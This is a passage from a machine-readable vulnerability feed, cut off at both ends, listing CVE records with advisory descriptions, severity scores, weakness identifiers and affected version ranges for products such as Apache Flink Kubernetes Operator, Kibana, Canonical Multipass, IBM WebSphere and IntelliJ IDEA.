Furthermore, for fetching from http/https addresses there is currently no allowlist on the URI scheme, no host check, no IP-range restriction, and no protection against pointing the URI at internal or link-local addresses. This issue affects Apache Flink Kubernetes Operator: from 1.3.0 before 1.15.0.\n\nUsers are recommended to upgrade to version 1.15.0, which fixes the issue."}],"metrics":{"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}]},"weaknesses":[{"source":"security@apache.org","type":"Secondary","description":[{"lang":"en","value":"CWE-552"},{"lang":"en","value":"CWE-918"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:apache:flink_kubernetes_operator:*:*:*:*:*:*:*:*","versionStartIncluding":"1.3.0","versionEndExcluding":"1.15.0","matchCriteriaId":"FDD73EA9-97EA-48BD-A4A4-4A6CFA3C3AD5"}]}]}],"references":[{"url":"https://lists.apache.org/thread/jvxs2kh2o60sl7qkl5nss4r5phzfl4cz","source":"security@apache.org","tags":["Mailing List"]},{"url":"http://www.openwall.com/lists/oss-security/2026/05/26/6","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Mailing List","Third Party Advisory"]}]}},{"cve":{"id":"CVE-2026-48906","sourceIdentifier":"security@joomla.org","published":"2026-05-27T11:16:24.713","lastModified":"2026-06-01T14:33:36.133","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"The vulnerability in the Tassos Framework Plugin allows users to delete arbitrary files on the affected 
sites."}],"metrics":{"cvssMetricV40":[{"source":"security@joomla.org","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:X/V:X/RE:X/U:X","baseScore":9.3,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"HIGH","subAvailabilityImpact":"HIGH","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"YES","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.2}]},"weaknesses":[{"source":"security@joomla.org","type":"Primary","description":
[{"lang":"en","value":"CWE-284"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"NVD-CWE-noinfo"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:advanced_custom_fields:*:*:*:*:*:joomla\\!:*:*","versionStartIncluding":"1.0.0","versionEndIncluding":"2.8.12","matchCriteriaId":"189398D2-7A8E-42FA-B18A-190945A234BB"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:advanced_custom_fields:*:*:*:*:*:joomla\\!:*:*","versionStartIncluding":"3.0.0","versionEndIncluding":"3.1.3","matchCriteriaId":"DCD7517D-D254-4C31-B75A-CB2CF99DE02E"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:convert_forms:*:*:*:*:*:joomla\\!:*:*","versionStartIncluding":"1.0.0","versionEndIncluding":"4.4.12","matchCriteriaId":"5F57C1C4-8DA9-4C0C-87AE-02341CA6BDF5"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:convert_forms:*:*:*:*:*:joomla\\!:*:*","versionStartIncluding":"5.0.0","versionEndIncluding":"5.1.5","matchCriteriaId":"461F45C6-72EA-490F-A6F1-683F880614B9"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:engagebox:*:*:*:*:*:joomla\\!:*:*","versionStartIncluding":"1.0.0","versionEndIncluding":"6.3.11","matchCriteriaId":"18C0CF40-BC13-4125-B7CE-0FA32F94A574"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:engagebox:*:*:*:*:*:joomla\\!:*:*","versionStartIncluding":"7.0.0","versionEndIncluding":"7.1.1","matchCriteriaId":"9F153D8A-C07C-43BD-B3DC-30C53AEE12E9"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:google_structured_data:*:*:*:*:*:joomla\\!:*:*","versionStartIncluding":"1.0.0","versionEndIncluding":"5.6.11","matchCriteriaId":"E58A9D7E-0BD5-4A86-928E-BEB4084BD22D"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:google_structured_data:*:*:*:*:*:joomla\\!:*:*","versionStartIncluding":"6.0.0","versionEndIncluding":"6.1.9","matchCriteriaId":"46F36745-0D2B-4E06-B4FF-1B1403801A87"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:mailchimp_auto-subscribe:*:*:*:*:*:joomla\\!:*:*","version
StartIncluding":"1.0.0","versionEndIncluding":"5.0.5","matchCriteriaId":"E78F126A-D3E9-474C-8DD5-553E99E48BB8"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:mailchimp_auto-subscribe:*:*:*:*:*:joomla\\!:*:*","versionStartIncluding":"5.1.0","versionEndIncluding":"5.2.0","matchCriteriaId":"08EBEB77-3F2B-424A-B845-37DD6274CF94"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:smile_pack:*:*:*:*:*:joomla\\!:*:*","versionStartIncluding":"1.0.0","versionEndIncluding":"1.2.6","matchCriteriaId":"2CC95C07-5786-4C8D-B7C3-67C73B9050AD"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:smile_pack:*:*:*:*:*:joomla\\!:*:*","versionStartIncluding":"2.0.0","versionEndIncluding":"2.1.0","matchCriteriaId":"35E61D16-F5A4-4D04-8086-F5B4A40EDC4F"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:tassos_code_snippets:1.0.0:*:*:*:*:joomla\\!:*:*","matchCriteriaId":"01825E14-AEA5-4C97-A665-E344E24F5C5B"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:tassos_framework:*:*:*:*:*:joomla\\!:*:*","versionStartIncluding":"1.0.0","versionEndIncluding":"6.0.1","matchCriteriaId":"08D7C0CF-C6F8-4FB3-A86A-75FBA632900D"}]}]}],"references":[{"url":"https://tassos.gr","source":"security@joomla.org","tags":["Product"]}]}},{"cve":{"id":"CVE-2026-4410","sourceIdentifier":"psirt@us.ibm.com","published":"2026-05-27T14:17:33.660","lastModified":"2026-06-01T14:28:24.160","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"IBM WebSphere Application Server - Liberty 19.0.0.7 through 26.0.0.5 and IBM WebSphere Application Server 9.0, and 8.5 and WebSphere Application Server Liberty are vulnerable to a denial of service, caused by sending a specially-crafted request. 
A remote attacker could exploit this vulnerability to cause the server to consume memory resources."}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H","baseScore":4.8,"baseSeverity":"MEDIUM","attackVector":"ADJACENT_NETWORK","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":1.2,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-400"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:ibm:websphere_application_server:*:*:*:*:-:*:*:*","versionStartIncluding":"8.5.0.0","versionEndIncluding":"8.5.5.29","matchCriteriaId":"631AA3FA-7D84-45CB-A5DB-9DEB7ABF32E7"},{"vulnerable":true,"criteria":"cpe:2.3:a:ibm:websphere_application_server:*:*:*:*:-:*:*:*","versionStartIncluding":"9.0.0.0","versionEndIncluding":"9.0.5.27","matchCriteriaId":"C7A90C7D-5C17-4C1E-B6F8-9E70851863AA"},{"vulnerable":true,"criteria":"cpe:2.3:a:ibm:websphere_application_server:*:*:*:*:liberty:*:*:*","versionStartIncluding":"19.0.0.7","versionEndIncluding":"26.0.0.5","matchCriteriaId":"9FB44040-AC0C-45B7-BA73-037911B6988F"}]}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7273424","source":"psirt@us.ibm.com","tags":["Vendor 
Advisory"]}]}},{"cve":{"id":"CVE-2026-49237","sourceIdentifier":"security@ubuntu.com","published":"2026-05-28T14:16:24.270","lastModified":"2026-06-01T13:27:32.780","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"An issue was discovered in Canonical Multipass for macOS before version 1.16.3 due to an incomplete fix for CVE-2025-5199. While the patch in version 1.16.0 updated the ownership of the multipassd daemon binary to root:wheel, five co-located binaries (multipass, qemu-img, qemu-system-aarch64, qemu-system-x86_64, and sshfs_server) in /Library/Application Support/com.canonical.multipass/bin/ retain ownership by the installing user and remain writable. Because the root LaunchDaemon (com.canonical.multipassd.plist) configures a PATH environment variable that prioritizes this user-writable directory and invokes these auxiliary binaries by their bare names, a local attacker can replace an auxiliary binary (such as qemu-img) with a malicious wrapper. When the root daemon subsequently triggers the binary during routine execution (e.g., via multipass launch), the malicious code executes with root privileges, leading to local privilege 
escalation."}],"metrics":{"cvssMetricV31":[{"source":"security@ubuntu.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":7.8,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":5.9}]},"weaknesses":[{"source":"security@ubuntu.com","type":"Secondary","description":[{"lang":"en","value":"CWE-276"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:canonical:multipass:*:*:*:*:*:*:*:*","versionEndExcluding":"1.16.3","matchCriteriaId":"633AA429-4296-43D2-8F9F-D5115F121BD3"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*","matchCriteriaId":"387021A0-AF36-463C-A605-32EA7DAC172E"}]}]}],"references":[{"url":"https://github.com/canonical/multipass/security/advisories/GHSA-r2xg-x32f-23c5","source":"security@ubuntu.com","tags":["Third Party Advisory","Exploit"]}]}},{"cve":{"id":"CVE-2026-49238","sourceIdentifier":"security@ubuntu.com","published":"2026-05-28T14:16:24.403","lastModified":"2026-06-01T13:26:31.580","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"An issue was discovered in Canonical Multipass before version 1.16.3. The host-side SFTP server component (sshfs_server), which executes with root privileges on the host, contains a path containment bypass vulnerability within its validate_path function in src/sshfs_mount/sftp_server.cpp. The function performs a plain string prefix comparison on requested paths without path separator validation or dot-dot (..) normalization. 
A local attacker with root privileges inside a guest virtual machine can bypass the FUSE layer by injecting raw SFTP frames (such as an SSH_FXP_OPEN request) directly into the sshfs_server process stdin/stdout pipes via procfs. By supplying a path containing directory traversal sequences that match the allowed mount prefix, the attacker can force the host-side root process to resolve the traversal and open files outside the designated mount boundary. This allows a guest-side user to read arbitrary files on the host filesystem, resulting in a virtual machine escape."}],"metrics":{"cvssMetricV31":[{"source":"security@ubuntu.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N","baseScore":8.4,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.0,"impactScore":5.8}]},"weaknesses":[{"source":"security@ubuntu.com","type":"Secondary","description":[{"lang":"en","value":"CWE-22"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:canonical:multipass:*:*:*:*:*:*:*:*","versionEndExcluding":"1.16.3","matchCriteriaId":"633AA429-4296-43D2-8F9F-D5115F121BD3"}]}]}],"references":[{"url":"https://github.com/canonical/multipass/security/advisories/GHSA-rhp2-23c4-r34w","source":"security@ubuntu.com","tags":["Third Party Advisory","Exploit"]},{"url":"https://github.com/canonical/multipass/security/advisories/GHSA-rhp2-23c4-r34w","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","tags":["Third Party Advisory","Exploit"]}]}},{"cve":{"id":"CVE-2026-42398","sourceIdentifier":"security@elastic.co","published":"2026-05-28T21:16:30.180","lastModified":"2026-06-01T14:17:50.670","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Server-Side Request 
Forgery (CWE-918) in Kibana allows authenticated users with connector management privileges to bypass the operator-configured connection allowlist. By configuring a Webhook connector with a crafted target, an attacker can cause Kibana to issue outbound requests to destinations that the egress restriction controls were intended to block."}],"metrics":{"cvssMetricV31":[{"source":"security@elastic.co","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N","baseScore":7.7,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.1,"impactScore":4.0}]},"weaknesses":[{"source":"security@elastic.co","type":"Secondary","description":[{"lang":"en","value":"CWE-918"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*","versionStartIncluding":"9.0.0","versionEndExcluding":"9.2.8","matchCriteriaId":"301F60F3-1479-432C-875A-76797F9A16D8"},{"vulnerable":true,"criteria":"cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*","versionStartIncluding":"9.3.0","versionEndExcluding":"9.3.2","matchCriteriaId":"C0BF565A-EF1A-4A9F-A234-BDE468EDD3E6"}]}]}],"references":[{"url":"https://discuss.elastic.co/t/kibana-9-2-8-and-9-3-2-security-update-esa-2026-37/386557","source":"security@elastic.co","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-42399","sourceIdentifier":"security@elastic.co","published":"2026-05-28T21:16:30.323","lastModified":"2026-06-01T14:14:05.367","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Uncontrolled Resource Consumption (CWE-400) in Kibana can lead to denial of service via Excessive Allocation (CAPEC-130). 
An authenticated low-privileged user can cause Kibana to consume exponentially increasing amounts of memory by submitting a specially crafted Timelion visualization expression containing deeply chained function calls. The resulting data structure grows without bound, exhausting available memory and causing the Kibana service to crash and become unavailable to all users."}],"metrics":{"cvssMetricV31":[{"source":"security@elastic.co","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":3.6}]},"weaknesses":[{"source":"security@elastic.co","type":"Secondary","description":[{"lang":"en","value":"CWE-400"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*","versionStartIncluding":"8.0.0","versionEndExcluding":"8.19.16","matchCriteriaId":"43EDC5B3-131D-489E-8447-05C5C599E6A7"},{"vulnerable":true,"criteria":"cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*","versionStartIncluding":"9.0.0","versionEndExcluding":"9.3.5","matchCriteriaId":"E9B40710-912A-4157-9F25-89CE26C098A9"}]}]}],"references":[{"url":"https://discuss.elastic.co/t/kibana-8-19-16-and-9-3-5-security-update-esa-2026-36/386556","source":"security@elastic.co","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-42400","sourceIdentifier":"security@elastic.co","published":"2026-05-28T21:16:30.497","lastModified":"2026-06-01T14:13:36.980","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Uncontrolled Resource Consumption (CWE-400) in Kibana can lead to denial of service via Excessive Allocation (CAPEC-130). 
An authenticated user can send a specially crafted compressed request payload that is processed prior to authorization checks, causing excessive memory and CPU resource consumption that can result in a Kibana instance becoming unresponsive or crashing."}],"metrics":{"cvssMetricV31":[{"source":"security@elastic.co","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":3.6}]},"weaknesses":[{"source":"security@elastic.co","type":"Secondary","description":[{"lang":"en","value":"CWE-400"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*","versionStartIncluding":"8.0.0","versionEndExcluding":"8.19.16","matchCriteriaId":"43EDC5B3-131D-489E-8447-05C5C599E6A7"},{"vulnerable":true,"criteria":"cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*","versionStartIncluding":"9.0.0","versionEndExcluding":"9.3.5","matchCriteriaId":"E9B40710-912A-4157-9F25-89CE26C098A9"},{"vulnerable":true,"criteria":"cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*","versionStartIncluding":"9.4.0","versionEndExcluding":"9.4.2","matchCriteriaId":"81FF6553-FE7A-475D-9D50-5D0FC66FE375"}]}]}],"references":[{"url":"https://discuss.elastic.co/t/kibana-8-19-16-9-3-5-9-4-2-security-update-esa-2026-35/386554","source":"security@elastic.co","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49093","sourceIdentifier":"security@elastic.co","published":"2026-05-28T21:16:34.350","lastModified":"2026-06-01T14:13:11.843","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Server-Side Request Forgery (CWE-918) in Kibana can allow an authenticated user with connector management 
privileges to bypass the operator-configured connector allowlist, causing the Kibana server to issue outbound requests to destinations the egress controls were intended to block."}],"metrics":{"cvssMetricV31":[{"source":"security@elastic.co","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N","baseScore":6.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":1.8,"impactScore":4.0},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N","baseScore":7.7,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.1,"impactScore":4.0}]},"weaknesses":[{"source":"security@elastic.co","type":"Secondary","description":[{"lang":"en","value":"CWE-918"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*","versionStartIncluding":"9.3.0","versionEndExcluding":"9.3.3","matchCriteriaId":"5EE7B9F3-E587-498B-822D-785CB848F767"}]}]}],"references":[{"url":"https://discuss.elastic.co/t/kibana-9-3-3-security-update-esa-2026-40/386562","source":"security@elastic.co","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49094","sourceIdentifier":"security@elastic.co","published":"2026-05-28T21:16:34.503","lastModified":"2026-06-01T13:31:57.200","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Uncontrolled Resource Consumption (CWE-400) in Kibana can lead to denial of service via Excessive Allocation (CAPEC-130). 
An authenticated user with viewer-level access can submit a request containing an oversized input value to an analytics collections management endpoint. Kibana will consume excessive CPU and memory resources while processing the request. This results in Kibana becoming unavailable to all users until the service is manually recovered."}],"metrics":{"cvssMetricV31":[{"source":"security@elastic.co","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":3.6}]},"weaknesses":[{"source":"security@elastic.co","type":"Secondary","description":[{"lang":"en","value":"CWE-400"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*","versionStartIncluding":"8.0.0","versionEndExcluding":"8.19.16","matchCriteriaId":"43EDC5B3-131D-489E-8447-05C5C599E6A7"}]}]}],"references":[{"url":"https://discuss.elastic.co/t/kibana-8-19-16-security-update-esa-2026-39/386561/1","source":"security@elastic.co","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49095","sourceIdentifier":"security@elastic.co","published":"2026-05-28T21:16:34.660","lastModified":"2026-06-01T13:30:50.997","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Input Validation (CWE-20) in the Kibana Fleet agent policy management feature can lead to privilege escalation. An authenticated user with Fleet management privileges can manipulate agent policy configuration by injecting values into a configuration override mechanism that is not adequately validated. 
An attacker can cause Elastic Agents to be issued API keys with elevated Elasticsearch privileges, potentially granting unauthorized read and write access to sensitive Elasticsearch security indices beyond what is intended for the Fleet management role."}],"metrics":{"cvssMetricV31":[{"source":"security@elastic.co","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":1.2,"impactScore":5.2}]},"weaknesses":[{"source":"security@elastic.co","type":"Secondary","description":[{"lang":"en","value":"CWE-20"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*","versionStartIncluding":"8.0.0","versionEndExcluding":"8.19.16","matchCriteriaId":"43EDC5B3-131D-489E-8447-05C5C599E6A7"},{"vulnerable":true,"criteria":"cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*","versionStartIncluding":"9.0.0","versionEndExcluding":"9.3.5","matchCriteriaId":"E9B40710-912A-4157-9F25-89CE26C098A9"},{"vulnerable":true,"criteria":"cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*","versionStartIncluding":"9.4.0","versionEndExcluding":"9.4.2","matchCriteriaId":"81FF6553-FE7A-475D-9D50-5D0FC66FE375"}]}]}],"references":[{"url":"https://discuss.elastic.co/t/kibana-fleet-8-19-16-9-3-5-and-9-4-2-security-update-esa-2026-38/386559","source":"security@elastic.co","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49366","sourceIdentifier":"cve@jetbrains.com","published":"2026-05-29T19:16:26.313","lastModified":"2026-06-01T13:59:21.370","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In JetBrains IntelliJ IDEA before 2026.1.1 command injection was possible via filename 
completion"}],"metrics":{"cvssMetricV31":[{"source":"cve@jetbrains.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","baseScore":7.8,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":5.9}]},"weaknesses":[{"source":"cve@jetbrains.com","type":"Primary","description":[{"lang":"en","value":"CWE-78"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:jetbrains:intellij_idea:*:*:*:*:*:*:*:*","versionEndExcluding":"2026.1.1","matchCriteriaId":"2FC70797-25C7-4E0C-9E47-0EA1AD21E4B3"}]}]}],"references":[{"url":"https://www.jetbrains.com/privacy-security/issues-fixed/","source":"cve@jetbrains.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49367","sourceIdentifier":"cve@jetbrains.com","published":"2026-05-29T19:16:26.440","lastModified":"2026-06-01T13:56:59.427","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In JetBrains IntelliJ IDEA before 2026.1.1 command execution was possible via the guest user 
account"}],"metrics":{"cvssMetricV31":[{"source":"cve@jetbrains.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H","baseScore":8.0,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.1,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.9}]},"weaknesses":[{"source":"cve@jetbrains.com","type":"Primary","description":[{"lang":"en","value":"CWE-862"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:jetbrains:intellij_idea:*:*:*:*:*:*:*:*","versionEndExcluding":"2026.1.1","matchCriteriaId":"2FC70797-25C7-4E0C-9E47-0EA1AD21E4B3"}]}]}],"references":[{"url":"https://www.jetbrains.com/privacy-security/issues-fixed/","source":"cve@jetbrains.com","tags":["Vendor 